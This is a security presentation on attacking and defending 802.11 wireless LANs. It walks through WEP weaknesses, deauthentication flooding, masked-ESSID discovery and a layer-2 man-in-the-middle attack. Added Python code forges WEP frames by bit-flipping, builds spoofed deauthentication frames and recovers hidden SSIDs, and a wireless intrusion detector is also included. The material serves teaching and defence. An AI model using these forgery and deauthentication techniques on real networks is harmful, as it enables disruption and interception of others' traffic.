Slide 1: Wireless Security, Advanced Wireless LAN Hacking
Mark Nakrop, Managing Director, nForce Security Systems
Slide 2: Agenda
Wireless Security, Advanced Wireless LAN Hacking
Advanced 802.11 Attack
Wireless Best Practices
Wireless Hacking Tools: wlan-jack, essid-jack, monkey-jack, kracker-jack
Network Stumbler
Mitigation Strategies
Slide 3: Conventional LAN Security Model
[Diagram: Internet, Corporate Firewall, internal LAN]
Firewall shields inside from outside.
Slide 4: Attacks can happen over the air
[Diagram: Internet, Corporate Firewall, wireless clients reaching the internal LAN directly]
Attacks over the wireless link bypass the firewall.
Network not confined to wires/premises anymore.
Slide 5: Threats from Unmanaged Devices
[Diagram: enterprise network and a neighboring network, showing a rogue AP, a mis-configured AP, AP MAC spoofing, a honeypot AP, an unauthorized association and a client mis-association]
Common
Rogue Access Points
Mis-configured Access Points
Denial of Service: de-authentication flood, packet storm
MAC Spoofing APs
Malicious
Honeypot APs
Unauthorized associations, client mis-associations
Ad hoc connections
Slide 6: Goals of WLAN Security
Fortify authorized communication
Access control and encryption over the wireless link
WPA and 802.11i address this adequately; WEP does not (see the WEP slides below)
Protect the network from unmanaged devices
Rogue APs, DoS attacks, client mis-associations, honeypots, ad hoc networks, MAC spoofing, etc.
The current pain point in enterprise networks
Addressed by Wireless Intrusion Detection and Prevention Systems
Slide 7: 802.11, 802.11b, etc.
IEEE standard, part of the 802 family alongside Ethernet (802.3): same 48-bit MAC addressing, 802.2 LLC on top
802.11: FHSS or DSSS, WEP, 2.4 GHz, Infrastructure (BSS) or Ad-Hoc (IBSS)
Limited to 2 Mb/s; for FHSS because of FCC limits on dwell time per frequency hop
802.11b: DSSS only, WEP, 2.4 GHz, Infrastructure or Ad-Hoc
Up to 11 Mb/s
Also known as Wi-Fi
802.11a (OFDM, 5 GHz, up to 54 Mb/s) and 802.11g (OFDM in 2.4 GHz, up to 54 Mb/s, backward compatible with 802.11b)
Slide 8: Low-level DoS is hard to prevent
Like any other environment, there are no silver bullets.
Slide 9: Current Security Practices
WEP (Wired Equivalent Privacy)
Link level
Very broken
Firewalls / MAC filtering
Reactionary: IDS / active portal
Higher-level protocols
Slide 10: Thoughts on WEP
Key management beyond a handful of people is impossible
Too much trust: one shared key for everyone
Difficult administration
Key lifetime can get very short in an enterprise (every departure or lost device means re-keying every client)
No authentication for management frames
No per-packet authentication (the CRC-32 integrity check value is not a keyed MAC)
False advertising!!!
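The "no per-packet authentication" point is worth seeing concretely. The following is an added example, not code from the original deck or from nForce Security Systems: a minimal pure-Python model of WEP (RC4 keystream over IV||key, CRC-32 ICV) and a bit-flipping forgery that an attacker can perform on a captured frame without knowing the key, because CRC-32 is affine and the ICV is only XORed with keystream. The key, IV and message are constructed for the demonstration.

```python
import zlib


def rc4(key: bytes, length: int) -> bytes:
    """Return `length` bytes of RC4 keystream for `key` (KSA followed by PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:                   # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP integrity check value: plain CRC-32, little-endian, no key involved."""
    return (zlib.crc32(data) & 0xFFFFFFFF).to_bytes(4, "little")


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """IV (3 bytes, sent in the clear) || RC4(IV||key) XOR (plaintext || ICV)."""
    body = plaintext + icv(plaintext)
    return iv + xor(body, rc4(iv + key, len(body)))


def wep_decrypt(key: bytes, frame: bytes):
    """Return (plaintext, icv_ok); a receiver drops the frame when icv_ok is False."""
    iv, ct = frame[:3], frame[3:]
    body = xor(ct, rc4(iv + key, len(ct)))
    plaintext, received_icv = body[:-4], body[-4:]
    return plaintext, received_icv == icv(plaintext)


def flip_bits(frame: bytes, delta: bytes) -> bytes:
    """Change the plaintext of an encrypted frame to plaintext XOR delta, without the key.

    CRC-32 is affine, so for equal-length inputs crc(p ^ d) == crc(p) ^ crc(d) ^ crc(zeros).
    Data and ICV are both only XORed with keystream, so XORing the ciphertext with
    delta || (crc(delta) ^ crc(zeros)) yields a frame whose ICV still verifies.
    """
    iv, ct = frame[:3], frame[3:]
    if len(delta) + 4 != len(ct):
        raise ValueError("delta must cover the whole plaintext")
    icv_delta = xor(icv(delta), icv(bytes(len(delta))))
    return iv + xor(ct, delta + icv_delta)


def demo():
    key = b"\x01\x02\x03\x04\x05"          # constructed 40-bit WEP key (the attacker does not know it)
    iv = b"\x0a\x0b\x0c"                   # constructed IV, visible in the frame header
    plaintext = b"TRANSFER 100 TO ACCT 4711"
    frame = wep_encrypt(key, iv, plaintext)

    # The attacker knows the message layout, not the content: turn "100" into "900".
    delta = bytearray(len(plaintext))
    delta[9] = ord("1") ^ ord("9")

    # Without the ICV fix-up the receiver notices the tampering ...
    naive = iv + xor(frame[3:], bytes(delta) + b"\x00" * 4)
    _, naive_ok = wep_decrypt(key, naive)

    # ... with it the forged frame passes the integrity check.
    forged_pt, forged_ok = wep_decrypt(key, flip_bits(frame, bytes(delta)))
    return forged_pt, forged_ok, naive_ok


if __name__ == "__main__":
    print(demo())
```

A keyed MAC (as used by the 802.11i Michael and CCMP integrity checks) closes this hole; a CRC cannot, whatever the key length.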
Slide 11: What is Lacking?
Scalability
Many clients
Large networks
Protection for all parties
Eliminate invalid trust assumptions
Slide 12: What is War Driving?
Driving around in a vehicle (or parking at interesting places) equipped with wireless devices and related tools, with the goal of discovering wireless networks, is known as war driving. War-drivers define it as "the benign act of locating and logging wireless access points while in motion." This benign act is of course equally useful to attackers, and the tools are easy to get.
Slide 13: What is War Chalking?
War chalking is the practice of marking sidewalks and walls with special symbols to indicate that wireless access is nearby, so that others do not need to go through the trouble of the same discovery.
Slide 14: What Will Be Covered
Wireless network best practices
Practical attacks
The focus of the attack(s): the network layers, specifically the bottom two (physical and 802.11 MAC)
Custom (forged) 802.11b management frames
The Tool Box: drivers, utilities, proof-of-concept code
Slide 15: What Will Be Covered
Attack scenarios
Denial of service
Masked ESSID detection
802.11b layer MITM attack
Inadequate VPN implementations
Mitigation strategies
Slide 16: Wireless Best Practices (as commonly recommended)
Enable WEP (Wired Equivalent Privacy)
Key rotation when equipment supports it
Disable broadcast of the ESSID
Block null-ESSID connections
Restrict access by MAC address
Use VPN technology
Use strong mutual authentication
Slide 17: Practical Attacks (against each of those practices)
Enable WEP: can be cracked passively
Masked ESSID: can be passively observed in management frames (probe requests and probe responses) during association
Block null-ESSID connects: same problem, the ESSID is still sent in the clear
Restrict access by MAC address: MAC addresses are sent in the clear and can be spoofed
Install VPN: a weakly authenticated VPN is susceptible to active attack (MITM)
Strong mutual authentication: ?
Slide 18: The Tool Box
Custom drivers
Air-Jack
Custom driver for Prism II (HFA384x) cards
MAC address setting/spoofing
Send custom (forged) management frames
Slides 19-24: Attack Scenarios – WLAN-Jack
WLAN-Jack floods forged deauthentication frames (denial of service)
[Airopeek traces of the deauthentication flood]
[Decode of a deauthentication frame]
"This is your connection" / "This is your connection on Jack" (before and during the flood)
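The deauthentication frame decoded on slide 22 is short enough to build by hand, which is exactly why WLAN-Jack works: the 802.11 management header has no authenticator, so address 2 is whatever the sender writes there. The following is an added example, not code from the deck or the Air-Jack project. It forges a deauthentication frame the way WLAN-Jack would (broadcast destination, the AP's MAC as source) and decodes it field by field; the AP address is constructed, and the reason-code names are from the 802.11 reason-code table.

```python
import struct

TYPE_MGMT = 0
SUBTYPE_DEAUTH = 0x0C
BROADCAST = "ff:ff:ff:ff:ff:ff"
# Reason codes from the 802.11 deauthentication/disassociation table (subset)
REASON_CODES = {
    1: "Unspecified reason",
    2: "Previous authentication no longer valid",
    3: "Deauthenticated because sending station is leaving",
    7: "Class 3 frame received from nonassociated station",
}


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def build_deauth(dst: str, src: str, bssid: str, reason: int = 7, seq: int = 0) -> bytes:
    """Forge an 802.11 deauthentication frame.

    Nothing in the frame proves who sent it: `src` (address 2) is just a field we fill in,
    so an attacker writes the access point's MAC there and the client believes the AP.
    """
    frame_control = struct.pack("<H", (SUBTYPE_DEAUTH << 4) | (TYPE_MGMT << 2))  # b"\xc0\x00"
    duration = struct.pack("<H", 0x013A)                                          # NAV, microseconds
    seq_ctrl = struct.pack("<H", seq << 4)                                        # 12-bit seq, 4-bit frag
    header = frame_control + duration + mac_bytes(dst) + mac_bytes(src) + mac_bytes(bssid) + seq_ctrl
    return header + struct.pack("<H", reason)


def decode_frame(frame: bytes) -> dict:
    """Decode the 24-byte management header and, for deauthentication, the reason code."""
    if len(frame) < 24:
        raise ValueError("frame shorter than an 802.11 header")
    fc, duration = struct.unpack_from("<HH", frame, 0)
    info = {
        "version": fc & 0x3,
        "type": (fc >> 2) & 0x3,
        "subtype": (fc >> 4) & 0xF,
        "duration": duration,
        "addr1": mac_str(frame[4:10]),    # receiver / destination
        "addr2": mac_str(frame[10:16]),   # transmitter / source (an unauthenticated claim)
        "addr3": mac_str(frame[16:22]),   # BSSID
        "seq": struct.unpack_from("<H", frame, 22)[0] >> 4,
    }
    if info["type"] == TYPE_MGMT and info["subtype"] == SUBTYPE_DEAUTH:
        reason = struct.unpack_from("<H", frame, 24)[0]
        info["reason"] = reason
        info["reason_text"] = REASON_CODES.get(reason, "reserved")
    return info


def hexdump(frame: bytes) -> str:
    return " ".join(f"{b:02x}" for b in frame)


def demo() -> dict:
    ap = "00:11:22:33:44:55"         # constructed AP MAC
    # What WLAN-Jack transmits: addressed to everyone, claiming to come from the AP.
    forged = build_deauth(BROADCAST, ap, ap, reason=7, seq=17)
    return decode_frame(forged)


if __name__ == "__main__":
    frame = build_deauth(BROADCAST, "00:11:22:33:44:55", "00:11:22:33:44:55")
    print(hexdump(frame))
    for k, v in decode_frame(frame).items():
        print(f"{k:12} {v}")
```

Sending the 26 bytes on the air still needs a driver that accepts raw management frames (the Prism II Air-Jack driver on slide 18); the frame itself is the whole attack, repeated as fast as the card will transmit.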
Slide 25: Attack Scenarios – ESSID-Jack
Is the ESSID a shared secret? No.
If I mask the ESSID in the AP beacons, will unauthorized users be unable to associate with my AP? No.
Discovering a masked ESSID
Send a deauthenticate frame to the broadcast address
Obtain the ESSID from the client probe request or the AP probe response sent as clients reassociate
Slides 26-28: Attack Scenarios – ESSID-Jack
[Airopeek traces of the probe request / probe response exchange carrying the masked ESSID]
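The reason ESSID masking fails is visible in the frame formats. The following is an added example, not code from the deck or the Air-Jack project: it builds a beacon with a masked (zero-length) SSID element, a client probe request and the AP's probe response, then parses the tagged parameters the way a passive sniffer would. The beacon yields nothing; the probe frames exchanged after a deauthentication hand over the ESSID in the clear. Addresses, channel and ESSID are constructed.

```python
import struct

BROADCAST = "ff:ff:ff:ff:ff:ff"
SUBTYPE_NAMES = {4: "probe-req", 5: "probe-resp", 8: "beacon"}
TAG_SSID, TAG_RATES, TAG_DS_PARAMS = 0, 1, 3


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def mgmt_header(subtype: int, dst: str, src: str, bssid: str) -> bytes:
    """24-byte management header: frame control, duration, addr1..3, sequence control."""
    return (struct.pack("<H", subtype << 4) + b"\x00\x00"
            + mac_bytes(dst) + mac_bytes(src) + mac_bytes(bssid) + b"\x00\x00")


def info_elements(ssid: bytes, channel=None) -> bytes:
    """Tagged parameters: SSID, supported rates (1/2/5.5/11 Mb/s basic), optional DS channel."""
    ies = bytes([TAG_SSID, len(ssid)]) + ssid
    ies += bytes([TAG_RATES, 4, 0x82, 0x84, 0x8B, 0x96])
    if channel is not None:
        ies += bytes([TAG_DS_PARAMS, 1, channel])
    return ies


def beacon(bssid: str, ssid: bytes, channel: int, masked: bool = False) -> bytes:
    """Beacon: timestamp, interval, capability, then IEs. A masked ESSID is a zero-length SSID IE."""
    fixed = struct.pack("<QHH", 0, 100, 0x0011)   # capability: ESS + privacy (WEP)
    return mgmt_header(8, BROADCAST, bssid, bssid) + fixed + info_elements(b"" if masked else ssid, channel)


def probe_request(client: str, ssid: bytes) -> bytes:
    """Directed probe request: the client names the ESSID it is looking for."""
    return mgmt_header(4, BROADCAST, client, BROADCAST) + info_elements(ssid)


def probe_response(bssid: str, client: str, ssid: bytes, channel: int) -> bytes:
    """Probe response: same body layout as a beacon, and the SSID is never masked here."""
    fixed = struct.pack("<QHH", 0, 100, 0x0011)
    return mgmt_header(5, client, bssid, bssid) + fixed + info_elements(ssid, channel)


def parse_ies(body: bytes) -> dict:
    ies, i = {}, 0
    while i + 2 <= len(body):
        tag, length = body[i], body[i + 1]
        ies[tag] = body[i + 2:i + 2 + length]
        i += 2 + length
    return ies


def extract_ssid(frame: bytes):
    """Return (subtype name, address 2, ssid) for beacon/probe frames, None for anything else."""
    fc, = struct.unpack_from("<H", frame, 0)
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    if ftype != 0 or subtype not in SUBTYPE_NAMES:
        return None
    body_start = 24 if subtype == 4 else 24 + 12     # probe requests have no fixed fields
    ies = parse_ies(frame[body_start:])
    return SUBTYPE_NAMES[subtype], mac_str(frame[10:16]), ies.get(TAG_SSID, b"").decode(errors="replace")


def recover_masked_ssids(frames) -> dict:
    """What ESSID-Jack does after the broadcast deauthentication: collect every
    non-empty SSID seen in probe requests/responses as clients reassociate."""
    found = {}
    for frame in frames:
        parsed = extract_ssid(frame)
        if parsed and parsed[2]:              # skip frames carrying an empty (masked) SSID
            found.setdefault(parsed[2], set()).add(parsed[0])
    return found


def demo():
    ap, client = "00:11:22:33:44:55", "aa:bb:cc:dd:ee:ff"   # constructed addresses
    capture = [
        beacon(ap, b"corp-wlan", 6, masked=True),   # what NetStumbler sees: no name
        probe_request(client, b"corp-wlan"),        # client reassociating after the deauth
        probe_response(ap, client, b"corp-wlan", 6),
    ]
    return [extract_ssid(f) for f in capture], recover_masked_ssids(capture)
```

Blocking null-ESSID associations (slide 16) changes nothing here: the client must still name the ESSID in its probe request, which is the frame the sniffer reads.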
Slide 29: Attack Scenarios – Monkey-Jack
MITM attack
Taking over connections at layers 1 and 2
Insert the attack machine between the victim and the access point
Management frames
Deauthenticate the victim from the real AP
Send deauthenticate frames to the victim using the access point's MAC address as the source
Slide 30: Attack Scenarios – Monkey-Jack
Victim's 802.11 card scans channels to search for a new AP
Victim's 802.11 card associates with the fake AP on the attack machine
The fake AP is on a different channel than the real one
The attack machine's fake AP duplicates the MAC address and ESSID of the real AP
The attack machine associates with the real AP
The attack machine duplicates the MAC address of the victim's machine
The attack machine is now inserted and can pass frames through in a manner that is transparent to the upper-level protocols
Slides 31-33: Attack Scenarios – Monkey-Jack
[Diagrams: before Monkey-Jack (victim associated with the real AP) and after Monkey-Jack (victim on the fake AP, attack machine relaying to the real AP)]
Slide 35: NetStumbler
[Screenshot]
Slide 36: Airopeek
[Screenshot]
Slide 37: Mitigation Strategies
Wireless IDS and monitoring
VPN + strong mutual authentication
RF signal shaping: avoiding signal leaks
Antennas with a directional radiation pattern
Slide 38: Wi-Fi Intrusion Detection and Prevention
[Diagram: enterprise network with sensors observing AP MAC spoofing, a rogue AP, a mis-configured AP, an unauthorized association, and a honeypot mis-association]
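The monitoring the deck recommends comes down to a few checks over what the sensors hear on air. The following is an added example, not code from the deck or any WIDS product: a detector run over constructed management-frame summaries that flags the three attacks shown earlier, a WLAN-Jack deauthentication flood, a Monkey-Jack clone (the authorized AP's MAC and ESSID appearing on a second channel) and a honeypot beaconing from an unknown BSSID. The authorized-AP inventory, thresholds and sample events are all assumptions made for the example.

```python
from collections import defaultdict, deque

# Constructed inventory of managed APs: what the WIDS is allowed to see on air.
AUTHORIZED_APS = {
    "00:11:22:33:44:55": {"ssid": "corp-wlan", "channel": 6},
}


def detect(events, deauth_threshold=10, window_s=1.0):
    """Run three checks over sniffed management-frame summaries (dicts with keys
    t, subtype, src, and for beacons/probe responses bssid, ssid, channel).

    - deauth flood: more than `deauth_threshold` deauth frames from one source per window
    - AP MAC spoofing: an authorized BSSID advertised with another SSID or on another channel
      (Monkey-Jack's fake AP: same MAC and ESSID, different channel)
    - rogue / honeypot AP: beacons from a BSSID that is not in the inventory
    """
    alerts = []
    deauth_times = defaultdict(deque)
    reported = set()

    def alert(kind, who, detail):
        if (kind, who) not in reported:        # one alert per offender, not per frame
            reported.add((kind, who))
            alerts.append({"kind": kind, "who": who, "detail": detail})

    for ev in sorted(events, key=lambda e: e["t"]):
        if ev["subtype"] == "deauth":
            q = deauth_times[ev["src"]]        # sliding window of timestamps per claimed source
            q.append(ev["t"])
            while q and ev["t"] - q[0] > window_s:
                q.popleft()
            if len(q) > deauth_threshold:
                alert("deauth-flood", ev["src"], f"{len(q)} deauth frames in {window_s}s")
        elif ev["subtype"] in ("beacon", "probe-resp"):
            known = AUTHORIZED_APS.get(ev["bssid"])
            if known is None:
                alert("rogue-ap", ev["bssid"],
                      f"unknown BSSID advertising {ev['ssid']!r} on ch {ev['channel']}")
            elif ev["ssid"] != known["ssid"] or ev["channel"] != known["channel"]:
                alert("ap-mac-spoof", ev["bssid"],
                      f"seen as {ev['ssid']!r} on ch {ev['channel']}, "
                      f"expected {known['ssid']!r} on ch {known['channel']}")
    return alerts


def sample_events():
    """Constructed capture: a WLAN-Jack style flood, a Monkey-Jack style clone, a honeypot."""
    ap, attacker = "00:11:22:33:44:55", "de:ad:be:ef:00:01"
    # 15 deauth frames in 0.7 s, all claiming the AP as source
    events = [{"t": 0.05 * i, "subtype": "deauth", "src": ap} for i in range(15)]
    # legitimate beacons from the real AP on channel 6
    events += [{"t": 1.0 + i, "subtype": "beacon", "src": ap, "bssid": ap,
                "ssid": "corp-wlan", "channel": 6} for i in range(3)]
    # same MAC and ESSID on channel 11: the fake AP of slide 30
    events += [{"t": 2.5, "subtype": "beacon", "src": ap, "bssid": ap,
                "ssid": "corp-wlan", "channel": 11}]
    # unknown BSSID offering an attractive name: honeypot
    events += [{"t": 3.0, "subtype": "beacon", "src": attacker, "bssid": attacker,
                "ssid": "free-wifi", "channel": 1}]
    return events


if __name__ == "__main__":
    for a in detect(sample_events()):
        print(a["kind"], a["who"], a["detail"])
```

The deauth check keys on the claimed source address, which is exactly the field the attacker forges; it therefore tells you that someone is flooding in the AP's name, not who. Locating the sender needs signal strength or a second sensor, which is why the deck pairs monitoring with RF shaping rather than relying on either alone.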
Slide 39: Wireless networks are more susceptible to active attacks than wired networks
Enable all built-in security capabilities
Use VPN with strong mutual authentication
Monitor the wireless medium (air space) for suspicious activity
Slide 40: DON'T GET DISCOURAGED!
Attackers are constantly improving their skills
The security community must strive to improve as well
Keeping up is a lot of work
But it can be fun, and does help ensure job security
Experiment in your Hacker Analysis Laboratory
By remaining diligent, you can defend your computer systems!
Slide 41: THANK YOU